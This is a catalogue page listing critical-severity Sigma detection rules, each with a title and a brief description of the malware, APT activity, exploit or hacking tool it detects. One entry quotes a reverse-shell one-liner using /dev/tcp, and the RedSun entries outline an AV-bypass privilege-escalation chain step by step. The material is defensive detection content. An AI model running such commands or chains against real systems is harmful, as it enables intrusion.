Severity level
Critical-severity Sigma rules
177 community-maintained Sigma detection rules in the library are classified as critical severity. Critical rules flag activity that is almost always malicious and warrants immediate response. Coverage spans windows, linux, bitbucket. Open a rule to read its detection logic, MITRE ATT&CK mapping and original YAML.
Products
AD Object WriteDAC Access
criticalDetects WRITE_DAC access to a domain object
windows
Antivirus - APT Malware Signature
criticalDetects a highly relevant Antivirus alert that reports APT malware. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
antivirus
Antivirus - Exploitation Framework Signature
criticalDetects a highly relevant Antivirus alert that reports an exploitation framework. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
antivirus
Antivirus - Password Dumper Signature
criticalDetects a highly relevant Antivirus alert that reports password dumpers and stealers. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place and check if passwords need to be reset.
antivirus
Antivirus - Ransomware Signature
criticalDetects a highly relevant Antivirus alert that reports ransomware. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
antivirus
Antivirus - Remote Access Tools Signature
criticalDetects a highly relevant Antivirus alert that reports a remote access tool. This event must not be ignored just because the AV has blocked the malware but investigate, how it came there in the first place.
antivirus
Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection
criticalDetects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .
antivirus
APT27 - Emissary Panda Activity
criticalDetects the execution of DLL side-loading malware used by threat group Emissary Panda aka APT27
windows · process_creation
APT29 2018 Phishing Campaign CommandLine Indicators
criticalDetects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
windows · process_creation
APT29 2018 Phishing Campaign File Indicators
criticalDetects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant
windows · file_event
APT31 Judgement Panda Activity
criticalDetects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report
windows · process_creation
Arcadyan Router Exploitations
criticalDetects exploitation of vulnerabilities in Arcadyan routers as reported in CVE-2021-20090 and CVE-2021-20091.
webserver
Audit CVE Event
criticalDetects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log.
windows
Bad Opsec Powershell Code Artifacts
criticalfocuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads that often undergo minimal changes by attackers due to bad opsec.
windows · ps_module
Bitbucket Unauthorized Access To A Resource
criticalDetects unauthorized access attempts to a resource.
bitbucket
Bitbucket Unauthorized Full Data Export Triggered
criticalDetects when full data export is attempted an unauthorized user.
bitbucket
Certificate Request Export to Exchange Webserver
criticalDetects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell
windows
Citrix ADS Exploitation CVE-2020-8193 CVE-2020-8195
criticalDetects exploitation attempt against Citrix Netscaler, Application Delivery Controller (ADS) and Citrix Gateway exploiting vulnerabilities reported as CVE-2020-8193 and CVE-2020-8195
webserver
Citrix Netscaler Attack CVE-2019-19781
criticalDetects CVE-2019-19781 exploitation attempt against Citrix Netscaler, Application Delivery Controller and Citrix Gateway Attack
webserver
Cobalt Strike DNS Beaconing
criticalDetects suspicious DNS queries known from Cobalt Strike beacons
dns
CobaltStrike Named Pipe
criticalDetects the creation of a named pipe as used by CobaltStrike
windows · pipe_created
CobaltStrike Named Pipe Pattern Regex
criticalDetects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles
windows · pipe_created
CobaltStrike Service Installations - System
criticalDetects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement
windows
COLDSTEEL RAT Cleanup Command Execution
criticalDetects the creation of a "rundll32" process from the ColdSteel persistence service to initiate the cleanup command by calling one of its own exports. This functionality is not present in "MileStone2017" and some "MileStone2016" samples
windows · process_creation
COLDSTEEL RAT Service Persistence Execution
criticalDetects the creation of an "svchost" process with specific command line flags, that were seen present and used by ColdSteel RAT
windows · process_creation
Confluence Exploitation CVE-2019-3398
criticalDetects the exploitation of the Confluence vulnerability described in CVE-2019-3398
webserver
CosmicDuke Service Installation
criticalDetects the installation of a service named "javamtsup" on the system. The CosmicDuke info stealer uses Windows services typically named "javamtsup" for persistence.
windows
CVE-2010-5278 Exploitation Attempt
criticalMODx manager - Local File Inclusion:Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.
webserver
CVE-2020-0688 Exchange Exploitation via Web Log
criticalDetects the exploitation of Microsoft Exchange vulnerability as described in CVE-2020-0688
webserver
CVE-2020-10148 SolarWinds Orion API Auth Bypass
criticalDetects CVE-2020-10148 SolarWinds Orion API authentication bypass attempts
webserver
CVE-2020-5902 F5 BIG-IP Exploitation Attempt
criticalDetects the exploitation attempt of the vulnerability found in F5 BIG-IP and described in CVE-2020-5902
webserver
CVE-2021-1675 Print Spooler Exploitation
criticalDetects driver load events print service operational log that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675
windows
CVE-2021-1675 Print Spooler Exploitation Filename Pattern
criticalDetects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675
windows · file_event
CVE-2021-1675 Print Spooler Exploitation IPC Access
criticalDetects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527
windows
CVE-2021-31979 CVE-2021-33771 Exploits
criticalDetects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
windows · registry_set
CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum
criticalDetects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum
windows · file_event
CVE-2021-33766 Exchange ProxyToken Exploitation
criticalDetects the exploitation of Microsoft Exchange ProxyToken vulnerability as described in CVE-2021-33766
webserver
CVE-2021-40539 Zoho ManageEngine ADSelfService Plus Exploit
criticalDetects an authentication bypass vulnerability affecting the REST API URLs in ADSelfService Plus (CVE-2021-40539).
webserver
CVE-2023-23397 Exploitation Attempt
criticalDetects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.
windows
CVE-2024-1708 - ScreenConnect Path Traversal Exploitation - Security
criticalThis detects file modifications to ASPX and ASHX files within the root of the App_Extensions directory, which is allowed by a ZipSlip vulnerability in versions prior to 23.9.8. This occurs during exploitation of CVE-2024-1708. This requires an Advanced Auditing policy to log a successful Windows Event ID 4663 events and with a SACL set on the directory.
windows
CVE-2024-1709 - ScreenConnect Authentication Bypass Exploitation
criticalDetects GET requests to '/SetupWizard.aspx/[anythinghere]' that indicate exploitation of the ScreenConnect vulnerability CVE-2024-1709.
webserver
DarkSide Ransomware Pattern
criticalDetects DarkSide Ransomware and helpers
windows · process_creation
DC Machine Account Network Logon from Non-DC Source IP
criticalDetects a Domain Controller machine account authenticating from a source IP that is not a known Domain Controller. DC machine accounts should only authenticate locally or from other DCs during replication operations. Any logon event for a DC account from a workstation or non-DC host is anomalous and indicates one of the following: - Silver Ticket: attacker forged a Kerberos TGS for a DC machine account without requesting a TGT - Pass-the-Ticket: attacker is replaying a captured DC machine account TGS from a non-DC host - Overpass-the-Hash: attacker converted a stolen DC machine account hash into a Kerberos ticket and is authenticating from a non-DC host - Exploitation of certain vulnerabilities such as CVE-2026-54121 (Certighost): attacker obtained a DC certificate via ADCS CDC-chase abuse, authenticates via PKINIT as the DC from their own host, then performs DCSync
windows
DiagTrackEoP Default Login Username
criticalDetects the default "UserName" used by the DiagTrackEoP POC
windows
Diamond Sleet APT Scheduled Task Creation
criticalDetects registry event related to the creation of a scheduled task used by Diamond Sleet APT during exploitation of Team City CVE-2023-42793 vulnerability
windows
DNS RCE CVE-2020-1350
criticalDetects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process
windows · process_creation
Droppers Exploiting CVE-2017-11882
criticalDetects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe
windows · process_creation
DumpStack.log Defender Evasion
criticalDetects the use of the filename DumpStack.log to evade Microsoft Defender
windows · process_creation
Elise Backdoor Activity
criticalDetects Elise backdoor activity used by APT32
windows · process_creation
Equation Group DLL_U Export Function Load
criticalDetects a specific export function name used by one of EquationGroup tools
windows · process_creation
EvilNum APT Golden Chickens Deployment Via OCX Files
criticalDetects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report
windows · process_creation
Exchange Exploitation CVE-2021-28480
criticalDetects successful exploitation of Exchange vulnerability as reported in CVE-2021-28480
webserver
Exploit for CVE-2015-1641
criticalDetects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641
windows · process_creation
Exploit for CVE-2017-8759
criticalDetects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759
windows · process_creation
Exploiting CVE-2019-1388
criticalDetects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM
windows · process_creation
FlowCloud Registry Markers
criticalDetects FlowCloud malware registry markers from threat group TA410. The malware stores its configuration in the registry alongside drivers utilized by the malware's keylogger components.
windows · registry_event
FoggyWeb Backdoor DLL Loading
criticalDetects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected "version.dll" dll
windows · image_load
Fortinet CVE-2018-13379 Exploitation
criticalDetects CVE-2018-13379 exploitation attempt against Fortinet SSL VPNs
webserver
Fortinet CVE-2021-22123 Exploitation
criticalDetects CVE-2021-22123 exploitation attempt against Fortinet WAFs
webserver
Goofy Guineapig Backdoor Service Creation
criticalDetects service creation persistence used by the Goofy Guineapig backdoor
windows
Grafana Path Traversal Exploitation CVE-2021-43798
criticalDetects a successful Grafana path traversal exploitation
webserver
Greenbug Espionage Group Indicators
criticalDetects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
windows · process_creation
Griffon Malware Attack Pattern
criticalDetects process execution patterns related to Griffon malware as reported by Kaspersky
windows · process_creation
HackTool - BabyShark Agent Default URL Pattern
criticalDetects Baby Shark C2 Framework default communication patterns
proxy
HackTool - Credential Dumping Tools Named Pipe Created
criticalDetects well-known credential dumping tools execution via specific named pipe creation
windows · pipe_created
HackTool - DiagTrackEoP Default Named Pipe
criticalDetects creation of default named pipe used by the DiagTrackEoP POC, a tool that abuses "SeImpersonate" privilege.
windows · pipe_created
HackTool - DInjector PowerShell Cradle Execution
criticalDetects the use of the Dinject PowerShell cradle based on the specific flags
windows · process_creation
HackTool - Dumpert Process Dumper Default File
criticalDetects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
windows · file_event
HackTool - Dumpert Process Dumper Execution
criticalDetects the use of Dumpert process dumper, which dumps the lsass.exe process memory
windows · process_creation
HackTool - Empire PowerShell UAC Bypass
criticalDetects some Empire PowerShell UAC bypass methods
windows · process_creation
HackTool - F-Secure C3 Load by Rundll32
criticalF-Secure C3 produces DLLs with a default exported StartNodeRelay function.
windows · process_creation
HackTool - Inveigh Execution
criticalDetects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool
windows · process_creation
HackTool - Inveigh Execution Artefacts
criticalDetects the presence and execution of Inveigh via dropped artefacts
windows · file_event
HackTool - Koh Default Named Pipe
criticalDetects creation of default named pipes used by the Koh tool
windows · pipe_created
HackTool - Mimikatz Kirbi File Creation
criticalDetects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
windows · file_event
HackTool - PurpleSharp Execution
criticalDetects the execution of the PurpleSharp adversary simulation tool
windows · process_creation
HackTool - QuarksPwDump Dump File
criticalDetects a dump file written by QuarksPwDump password dumper
windows · file_event
HackTool - Rubeus Execution
criticalDetects the execution of the hacktool Rubeus via PE information of command line parameters
windows · process_creation
HackTool - SafetyKatz Execution
criticalDetects the execution of the hacktool SafetyKatz via PE information and default Image name
windows · process_creation
HackTool - SecurityXploded Execution
criticalDetects the execution of SecurityXploded Tools
windows · process_creation
HackTool - SharpUp PrivEsc Tool Execution
criticalDetects the use of SharpUp, a tool for local privilege escalation
windows · process_creation
HackTool - Sliver C2 Implant Activity Pattern
criticalDetects process activity patterns as seen being used by Sliver C2 framework implants
windows · process_creation
HackTool - SysmonEOP Execution
criticalDetects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120
windows · process_creation
HackTool - Windows Credential Editor (WCE) Execution
criticalDetects the use of Windows Credential Editor (WCE), a popular post-exploitation tool used to extract plaintext passwords, hash, PIN code and Kerberos tickets from memory. It is often used by threat actors for credential dumping and lateral movement within compromised networks.
windows · process_creation
Hacktool Execution - Imphash
criticalDetects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed
windows · process_creation
HAFNIUM Exchange Exploitation Activity
criticalDetects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers
windows · process_creation
InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
criticalDetects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
windows · file_event
Lazarus Group Activity
criticalDetects different process execution behaviors as described in various threat reports on Lazarus group activity
windows · process_creation
Leviathan Registry Key Activity
criticalDetects registry key used by Leviathan APT in Malaysian focused campaign
windows · registry_event
Linux Reverse Shell Indicator
criticalDetects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
linux · network_connection
LockerGoga Ransomware Activity
criticalDetects LockerGoga ransomware activity via specific command line.
windows · process_creation
Mailbox Export to Exchange Webserver
criticalDetects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it
windows
Malicious DLL Load By Compromised 3CXDesktopApp
criticalDetects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp
windows · image_load
Malicious Named Pipe Created
criticalDetects the creation of a named pipe seen used by known APTs or malware.
windows · pipe_created
Mint Sandstorm - AsperaFaspex Suspicious Process Execution
criticalDetects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
windows · process_creation
Mint Sandstorm - ManageEngine Suspicious Process Execution
criticalDetects suspicious execution from ManageEngine as seen used by Mint Sandstorm
windows · process_creation
Moriya Rootkit - System
criticalDetects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
windows
Moriya Rootkit File Created
criticalDetects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
windows · file_event
NotPetya Ransomware Activity
criticalDetects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
windows · process_creation
OceanLotus Registry Activity
criticalDetects registry keys created in OceanLotus (also known as APT32) attacks
windows · registry_event
OilRig APT Activity
criticalDetects OilRig activity as reported by Nyotron in their March 2018 report
windows · process_creation
OilRig APT Registry Persistence
criticalDetects OilRig registry persistence as reported by Nyotron in their March 2018 report
windows · registry_event
OilRig APT Schedule Task Persistence - Security
criticalDetects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
windows
OilRig APT Schedule Task Persistence - System
criticalDetects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
windows
Oracle WebLogic Exploit
criticalDetects access to a webshell dropped into a keystore folder on the WebLogic server
webserver
Oracle WebLogic Exploit CVE-2021-2109
criticalDetects the exploitation of the WebLogic server vulnerability described in CVE-2021-2109
webserver
OWASSRF Exploitation Attempt Using Public POC - Proxy
criticalDetects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint
proxy
OWASSRF Exploitation Attempt Using Public POC - Webserver
criticalDetects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint
webserver
Pandemic Registry Key
criticalDetects Pandemic Windows Implant
windows · registry_event
Persistence Via Sticky Key Backdoor
criticalBy replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system. When the sticky keys are "activated" the privilleged shell is launched.
windows · process_creation
Possible Coin Miner CPU Priority Param
criticalDetects command line parameter very often used with coin miners
linux
Potential Conti Ransomware Activity
criticalDetects a specific command used by the Conti ransomware group
windows · process_creation
Potential Credential Dumping Via LSASS Process Clone
criticalDetects a suspicious LSASS process process clone that could be a sign of credential dumping activity
windows · process_creation
Potential Credential Dumping Via LSASS SilentProcessExit Technique
criticalDetects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process
windows · registry_event
Potential CVE-2021-41379 Exploitation Attempt
criticalDetects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights
windows · process_creation
Potential CVE-2023-36884 Exploitation Pattern
criticalDetects a unique pattern seen being used by RomCom potentially exploiting CVE-2023-36884
proxy
Potential DCOM InternetExplorer.Application DLL Hijack
criticalDetects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
windows · file_event
Potential DCOM InternetExplorer.Application DLL Hijack - Image Load
criticalDetects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
windows · image_load
Potential Dridex Activity
criticalDetects potential Dridex acitvity via specific process patterns
windows · process_creation
Potential Dtrack RAT Activity
criticalDetects potential Dtrack RAT activity via specific process patterns
windows · process_creation
Potential Emotet Rundll32 Execution
criticalDetecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL
windows · process_creation
Potential Maze Ransomware Activity
criticalDetects specific process characteristics of Maze ransomware word document droppers
windows · process_creation
Potential QBot Activity
criticalDetects potential QBot activity by looking for process executions used previously by QBot
windows · process_creation
Potential Russian APT Credential Theft Activity
criticalDetects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
windows · process_creation
Potential SharePoint ToolShell CVE-2025-53770 Exploitation - File Create
criticalDetects the creation of file such as spinstall0.aspx which may indicate successful exploitation of CVE-2025-53770. CVE-2025-53770 is a zero-day vulnerability in SharePoint that allows remote code execution.
windows · file_event
Potential SMB Relay Attack Tool Execution
criticalDetects different hacktools used for relay attacks on Windows for privilege escalation
windows · process_creation
Potential SystemNightmare Exploitation Attempt
criticalDetects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM
windows · process_creation
PrinterNightmare Mimikatz Driver Name
criticalDetects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527
windows · registry_event
ProxyLogon MSExchange OabVirtualDirectory
criticalDetects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory
windows
ProxyLogon Reset Virtual Directories Based On IIS Log
criticalWhen exploiting this vulnerability with CVE-2021-26858, an SSRF attack is used to manipulate virtual directories
webserver
Pulse Secure Attack CVE-2019-11510
criticalDetects CVE-2019-11510 exploitation attempt - URI contains Guacamole
webserver
PwnDrp Access
criticalDetects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity
proxy
Qakbot Rundll32 Exports Execution
criticalDetects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity.
windows · process_creation
Qakbot Rundll32 Fake DLL Extension Execution
criticalDetects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity.
windows · process_creation
RedSun - Named Pipe Created
criticalDetects the creation of a named pipe with the hardcoded name "REDSUN". The RedSun exploit tool uses a pipe with this name for synchronisation and command communication between its components during the Cloud Files API + oplock-based AV bypass and privilege escalation chain. RedSun creates the pipe as \\??\pipe\REDSUN. The pipe server listens for the token-duplicated elevated process to connect and respond, completing the privilege escalation from user to SYSTEM. Presence of this pipe name indicates active or recent RedSun execution.
windows · pipe_created
RedSun - TieringEngineService.exe Detected as EICAR Test File
criticalDetects Windows Defender (EventID 1119 - Remediation Action Failed) flagging TieringEngineService.exe dropped in a characteristic RS-{GUID} temporary directory, or the RedSun.exe process itself being present. This covers the staging pattern used by RedSun, a Cloud Files API and opportunistic lock (oplock) based AV bypass/privilege escalation tool. RedSun works as follows: 1. Registers a Cloud Files sync root and creates a Cloud Files placeholder for TieringEngineService.exe under %TEMP%\RS-{GUID}\ 2. The placeholder file carries EICAR test file content (Virus:DOS/EICAR_Test_File) to reliably trigger a Defender scan and remediation attempt 3. Requests a batch oplock (FSCTL_REQUEST_BATCH_OPLOCK) on the placeholder file 4. When Defender attempts to scan/quarantine the file, the oplock triggers - holding the file open 5. During the oplock break window, RedSun swaps the mount point (junction) to redirect \\?\C:\Windows\System32 to the attacker-controlled temp path 6. This races the AV/OS into executing the malicious TieringEngineService.exe with elevated privileges
windows
RedSun - TieringEngineService.exe Staged in RS-Prefixed Temp Dir
criticalDetects the creation of a file named TieringEngineService.exe inside a directory whose path contains the RS- prefix characteristic of RedSun's staging directory (e.g. %TEMP%\RS-{GUID}\TieringEngineService.exe). RedSun registers a Cloud Files sync root under this RS-prefixed path and drops a masqueraded placeholder there as part of its oplock-based AV bypass and privilege escalation chain. The RS-{GUID} directory name is generated by RedSun itself and has no legitimate system usage, making the combination of this path prefix and the TieringEngineService.exe filename a highly specific indicator of RedSun activity.
windows · file_event
Registry Entries For Azorult Malware
criticalDetects the presence of a registry key created during Azorult execution
windows · registry_event
Renamed Whoami Execution
criticalDetects the execution of whoami that has been renamed to a different name to avoid detection
windows · process_creation
REvil Kaseya Incident Malware Patterns
criticalDetects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware)
windows · process_creation
Rorschach Ransomware Execution Activity
criticalDetects Rorschach ransomware execution activity
windows · process_creation
Serv-U Exploitation CVE-2021-35211 by DEV-0322
criticalDetects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322
windows · process_creation
Silence.EDA Detection
criticalDetects Silence EmpireDNSAgent as described in the Group-IP report
windows · ps_script
Small Sieve Malware Potential C2 Communication
criticalDetects potential C2 communication related to Small Sieve malware
proxy
SNAKE Malware Kernel Driver File Indicator
criticalDetects SNAKE malware kernel driver file indicator
windows · file_event
SNAKE Malware Service Persistence
criticalDetects the creation of a service named "WerFaultSvc" which seems to be used by the SNAKE malware as a persistence mechanism as described by CISA in their report
windows
Solarwinds SUPERNOVA Webshell Access
criticalDetects access to SUPERNOVA webshell as described in Guidepoint report
webserver
Sticky Key Like Backdoor Execution
criticalDetects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
windows · process_creation
Sticky Key Like Backdoor Usage - Registry
criticalDetects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen
windows · registry_event
Successful Exchange ProxyShell Attack
criticalDetects URP patterns and status codes that indicate a successful ProxyShell exploitation attack against Exchange servers
webserver
Sudo Privilege Escalation CVE-2019-14287 - Builtin
criticalDetects users trying to exploit sudo vulnerability reported in CVE-2019-14287
linux
Suspicious Child Process Of Veeam Dabatase
criticalDetects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection.
windows · process_creation
Suspicious Cobalt Strike DNS Beaconing - DNS Client
criticalDetects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
windows
Suspicious Cobalt Strike DNS Beaconing - Sysmon
criticalDetects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
windows · dns_query
Suspicious PowerShell Mailbox Export to Share
criticalDetects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations
windows · process_creation
Suspicious PowerShell Mailbox Export to Share - PS
criticalDetects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations
windows · ps_script
TrustedPath UAC Bypass Pattern
criticalDetects indicators of a UAC bypass method by mocking directories
windows · process_creation
Turla Group Commands May 2020
criticalDetects commands used by Turla group as reported by ESET in May 2020
windows · process_creation
Turla Group Lateral Movement
criticalDetects automated lateral movement by Turla group
windows · process_creation
Turla Group Named Pipes
criticalDetects a named pipe used by Turla group samples
windows · pipe_created
Turla PNG Dropper Service
criticalThis method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018
windows
UNC2452 PowerShell Pattern
criticalDetects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports
windows · process_creation
UNC4841 - Potential SEASPY Execution
criticalDetects execution of specific named binaries which were used by UNC4841 to deploy their SEASPY backdoor
linux · process_creation
Ursnif Malware C2 URL Pattern
criticalDetects Ursnif C2 traffic.
proxy
WannaCry Ransomware Activity
criticalDetects WannaCry ransomware activity
windows · process_creation
WCE wceaux.dll Access
criticalDetects wceaux.dll access while WCE pass-the-hash remote command execution on source host
windows
Webshell Remote Command Execution
criticalDetects possible command execution by web application/web shell
linux
Win Susp Computer Name Containing Samtheadmin
criticalDetects suspicious computer name samtheadmin-{1..100}$ generated by hacktool
windows
Windows Credential Editor Registry
criticalDetects the use of Windows Credential Editor (WCE)
windows · registry_event
Winnti Malware HK University Campaign
criticalDetects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities
windows · process_creation
Winnti Pipemon Characteristics
criticalDetects specific process characteristics of Winnti Pipemon malware reported by ESET
windows · process_creation
WMI Backdoor Exchange Transport Agent
criticalDetects a WMI backdoor in Exchange Transport Agents via WMI event filters
windows · process_creation
Wmiexec Default Output File
criticalDetects the creation of the default output filename used by the wmiexec tool
windows · file_event
Wmiprvse Wbemcomn DLL Hijack - File
criticalDetects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
windows · file_event
WordPress Wp2shell Webshell Plugin Access
criticalDetects post-exploitation access to the wp2shell webshell plugin dropped after successful exploitation of CVE-2026-63030 and CVE-2026-60137. After the pre-auth SQLi-to-admin bridge is established, the attacker can upload a malicious plugin (wp2shell) to the target WordPress instance. At this phase, the attacker accesses the webshell for command execution and persistence.
webserver
Zerologon Exploitation Using Well-known Tools
criticalThis rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with "kali" hostname.
windows
ZxShell Malware
criticalDetects a ZxShell start by the called and well-known function name
windows · process_creation